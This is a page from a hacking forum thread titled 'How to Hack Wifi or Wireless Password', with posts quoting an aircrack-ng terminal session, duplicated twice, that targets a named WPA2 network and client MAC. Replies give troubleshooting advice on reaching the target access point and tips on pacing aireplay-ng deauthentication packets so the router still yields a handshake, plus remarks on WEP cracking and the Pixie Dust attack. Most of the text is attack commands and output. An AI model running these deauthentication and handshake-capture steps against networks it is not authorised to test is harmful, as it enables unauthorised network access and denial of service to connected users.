The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Twelve Years of Service
Posts: 85
Threads: 17
RE: How to Hack Wifi or Wireless Password 08-15-2014, 06:21 AM
#91
(08-30-2012, 12:50 AM)unknown_user Wrote: [root@localhost unknownuser]# airmon-ng
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
[root@localhost unknownuser]# airmon-ng stop wlan1
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
(monitor mode disabled)
[root@localhost unknownuser]# airmon-ng start wlan1
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
980 avahi-daemon
990 NetworkManager
1000 avahi-daemon
1136 wpa_supplicant
14876 dhclient
Process with PID 14876 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
(monitor mode enabled on mon0)
[root@localhost unknownuser]# airodump-ng mon0
CH 8 ][ Elapsed: 8 s ][ 2012-08-29 22:49
CH 8 ][ Elapsed: 8 s ][ 2012-08-29 22:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:10:7B:E8:CC:54 -76 10 0 0 13 54e. WPA2 CCMP PSK rekateemorputra1
BSSID STATION PWR Rate Lost Packets Probes
[root@localhost unknownuser]# aireplay-ng -0 1 -a 28:10:7B:E8:CC:54 -c 94:0C:6D:E1:83:0E mon0
08:58:01 Waiting for beacon frame (BSSID: 28:10:7B:E8:CC:54) on channel 1
08:58:11 No such BSSID available.
Please specify an ESSID (-e).
where i did wrong??
u are too far from the target , u need to close enough to the target ap
•
Twelve Years of Service
Posts: 85
Threads: 17
RE: How to Hack Wifi or Wireless Password 08-15-2014, 06:21 AM
#92
(08-30-2012, 12:50 AM)unknown_user Wrote: [root@localhost unknownuser]# airmon-ng
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
[root@localhost unknownuser]# airmon-ng stop wlan1
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
(monitor mode disabled)
[root@localhost unknownuser]# airmon-ng start wlan1
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
980 avahi-daemon
990 NetworkManager
1000 avahi-daemon
1136 wpa_supplicant
14876 dhclient
Process with PID 14876 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
wlan1 Ralink 2573 USB rt73usb - [phy1]
(monitor mode enabled on mon0)
[root@localhost unknownuser]# airodump-ng mon0
CH 8 ][ Elapsed: 8 s ][ 2012-08-29 22:49
CH 8 ][ Elapsed: 8 s ][ 2012-08-29 22:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:10:7B:E8:CC:54 -76 10 0 0 13 54e. WPA2 CCMP PSK rekateemorputra1
BSSID STATION PWR Rate Lost Packets Probes
[root@localhost unknownuser]# aireplay-ng -0 1 -a 28:10:7B:E8:CC:54 -c 94:0C:6D:E1:83:0E mon0
08:58:01 Waiting for beacon frame (BSSID: 28:10:7B:E8:CC:54) on channel 1
08:58:11 No such BSSID available.
Please specify an ESSID (-e).
where i did wrong??
u are too far from the target , u need to close enough to the target ap
•
Eleven Years of Service
Posts: 396
Threads: 12
RE: How to Hack Wifi or Wireless Password 08-15-2014, 10:23 AM
#93
(05-20-2011, 01:10 AM)m3taxpl0it Wrote: You might want to point out that if ivs are not being re-injected to the ap you might have to deauthenticate a client that is already associated with that ap. But remember do it to many one time it will be a DoS to that client.
Code:
aireplay-ng --deauth 10 -a (bssid) -c (client) ath0
Well this is proven not to be good technique deauth attack should be single in the start cause there is a chance the router be "smart" enough to understand that you spaming deauth packages and then never give you the Handshake. (
TRUE STORY)
So better try 4-5 times with breaks :
Code:
aireplay-ng --deauth 1 -a (bssid) -c (client) wlan0
Before you spam it... I just saying...
Now on the topic:
This tutorial has typos on commands(like ath0 probably means eth0, or more likely wlan0), it also doesn't have nice order on how to do the things you need to do with aircrack suite. We have better tutorial from this about aircrack if I am not mistaken. Avoid reading this one which in my opinion isn't well written and also isn't needed.
Quote:"i will explain you how to crack Wifi or wireless password in just 10 to 15 minutes"
LOL you can't know on how much they will do this, its depended on many things...For example a WEP with like 30 digits password without good signal could take even 2 days... Modify this please.
(This post was last modified: 08-15-2014, 10:32 AM by krozz.)
MASTERING OTHERS IS STRENGTH, MASTERING YOURSELF IS TRUE POWER.
•
Twelve Years of Service
Posts: 99
Threads: 10
RE: How to Hack Wifi or Wireless Password 05-02-2015, 12:23 PM
#94
An old tutorial - but still useful.
Especially since anyone can set their Encryption to WEP and attempt to crack it.
Pixie Dust is the latest attack though.
BTC Donation: 1CaH23w8nozwzcAUpGWwi86VoQocoVKJoD
•
Eleven Years of Service
Posts: 655
Threads: 15
RE: How to Hack Wifi or Wireless Password 05-02-2015, 05:59 PM
#95
(08-15-2014, 10:23 AM)L0aD1nG Wrote: This tutorial has typos on commands(like ath0 probably means eth0, or more likely wlan0)
ath0 means ath0, Atheros wireless device zero.
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47
•
Users browsing this thread: 2 Guest(s)